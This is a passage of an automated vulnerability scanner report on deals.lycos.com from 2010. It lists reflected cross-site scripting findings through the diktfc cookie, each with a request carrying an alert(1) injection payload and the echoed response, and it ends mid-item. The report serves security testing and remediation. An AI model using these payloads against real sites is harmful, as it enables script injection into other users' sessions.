This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/dell-financial-services-25-off-laptops-more-414325 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2e7bd"><script>alert(1)</script>9753846fcc9; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:55 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:55 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18681

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/dell-financial-services-25-off-laptops-more-414325&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2e7bd"><script>alert(1)</script>9753846fcc9&amp;cj=1" alt="tracker" />
...[SNIP]...

1.168. http://deals.lycos.com/deal/dell-financial-services-25-off-laptops-more-414325 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/dell-financial-services-25-off-laptops-more-414325

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 298e6"%3balert(1)//fd955e4e72f was submitted in the diktfc cookie. This input was echoed as 298e6";alert(1)//fd955e4e72f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/dell-financial-services-25-off-laptops-more-414325 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A298e6"%3balert(1)//fd955e4e72f; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:56 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:56 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18637

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
>
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/dell-financial-services-25-off-laptops-more-414325",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A298e6";alert(1)//fd955e4e72f"
});
</script>
...[SNIP]...

1.169. http://deals.lycos.com/deal/dell-i5-dual-2-53ghz-14-laptop-bundle-900-414537 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/dell-i5-dual-2-53ghz-14-laptop-bundle-900-414537

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f572"><script>alert(1)</script>12d99f9dda4 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/dell-i5-dual-2-53ghz-14-laptop-bundle-900-414537 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2f572"><script>alert(1)</script>12d99f9dda4; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:29 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:29 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18863

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
//b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/dell-i5-dual-2-53ghz-14-laptop-bundle-900-414537&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2f572"><script>alert(1)</script>12d99f9dda4&amp;cj=1" alt="tracker" />
...[SNIP]...

1.170. http://deals.lycos.com/deal/dell-i5-dual-2-53ghz-14-laptop-bundle-900-414537 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/dell-i5-dual-2-53ghz-14-laptop-bundle-900-414537

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7b9b"%3balert(1)//d6f0902539e was submitted in the diktfc cookie. This input was echoed as e7b9b";alert(1)//d6f0902539e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/dell-i5-dual-2-53ghz-14-laptop-bundle-900-414537 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ae7b9b"%3balert(1)//d6f0902539e; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:30 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:31 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
t">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/dell-i5-dual-2-53ghz-14-laptop-bundle-900-414537",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ae7b9b";alert(1)//d6f0902539e"
});
</script>
...[SNIP]...

1.171. http://deals.lycos.com/deal/dell-i7-quad-2-93ghz-pc-22-lcd-910-414367 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/dell-i7-quad-2-93ghz-pc-22-lcd-910-414367

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a834a"%3balert(1)//5a3d78b4e4f was submitted in the diktfc cookie. This input was echoed as a834a";alert(1)//5a3d78b4e4f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/dell-i7-quad-2-93ghz-pc-22-lcd-910-414367 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa834a"%3balert(1)//5a3d78b4e4f; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:36 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:36 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
vascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/dell-i7-quad-2-93ghz-pc-22-lcd-910-414367",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa834a";alert(1)//5a3d78b4e4f"
});
</script>
...[SNIP]...

1.172. http://deals.lycos.com/deal/dell-i7-quad-2-93ghz-pc-22-lcd-910-414367 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/dell-i7-quad-2-93ghz-pc-22-lcd-910-414367

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35a58"><script>alert(1)</script>e26ae126c13 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/dell-i7-quad-2-93ghz-pc-22-lcd-910-414367 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A35a58"><script>alert(1)</script>e26ae126c13; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:35 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:35 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17609

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/dell-i7-quad-2-93ghz-pc-22-lcd-910-414367&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A35a58"><script>alert(1)</script>e26ae126c13&amp;cj=1" alt="tracker" />
...[SNIP]...

1.173. http://deals.lycos.com/deal/dell-vostro-core-2-duo-2-1ghz-16-laptop-409-414353 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/dell-vostro-core-2-duo-2-1ghz-16-laptop-409-414353

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b8b4"%3balert(1)//6666cd16315 was submitted in the diktfc cookie. This input was echoed as 3b8b4";alert(1)//6666cd16315 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/dell-vostro-core-2-duo-2-1ghz-16-laptop-409-414353 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3b8b4"%3balert(1)//6666cd16315; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:41 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:41 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18637

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
>
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/dell-vostro-core-2-duo-2-1ghz-16-laptop-409-414353",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3b8b4";alert(1)//6666cd16315"
});
</script>
...[SNIP]...

1.174. http://deals.lycos.com/deal/dell-vostro-core-2-duo-2-1ghz-16-laptop-409-414353 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/dell-vostro-core-2-duo-2-1ghz-16-laptop-409-414353

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2dfde"><script>alert(1)</script>8551183e611 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/dell-vostro-core-2-duo-2-1ghz-16-laptop-409-414353 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2dfde"><script>alert(1)</script>8551183e611; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:39 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:39 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18658

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/dell-vostro-core-2-duo-2-1ghz-16-laptop-409-414353&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2dfde"><script>alert(1)</script>8551183e611&amp;cj=1" alt="tracker" />
...[SNIP]...

1.175. http://deals.lycos.com/deal/digital-blue-carabiner-digital-camera-for-3-413838 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/digital-blue-carabiner-digital-camera-for-3-413838

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15d57"%3balert(1)//40027816f73 was submitted in the diktfc cookie. This input was echoed as 15d57";alert(1)//40027816f73 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/digital-blue-carabiner-digital-camera-for-3-413838 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A15d57"%3balert(1)//40027816f73; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:18 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:18 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18761

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
>
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/digital-blue-carabiner-digital-camera-for-3-413838",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A15d57";alert(1)//40027816f73"
});
</script>
...[SNIP]...

1.176. http://deals.lycos.com/deal/digital-blue-carabiner-digital-camera-for-3-413838 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/digital-blue-carabiner-digital-camera-for-3-413838

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82e75"><script>alert(1)</script>1d919f1ca71 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/digital-blue-carabiner-digital-camera-for-3-413838 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A82e75"><script>alert(1)</script>1d919f1ca71; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:16 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18403

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/digital-blue-carabiner-digital-camera-for-3-413838&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A82e75"><script>alert(1)</script>1d919f1ca71&amp;cj=1" alt="tracker" />
...[SNIP]...

1.177. http://deals.lycos.com/deal/drawn-the-painted-tower-for-ipad-for-5-414364 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/drawn-the-painted-tower-for-ipad-for-5-414364

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff58e"%3balert(1)//2eff680c602 was submitted in the diktfc cookie. This input was echoed as ff58e";alert(1)//2eff680c602 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/drawn-the-painted-tower-for-ipad-for-5-414364 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aff58e"%3balert(1)//2eff680c602; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:37 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:37 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16725

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
ript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
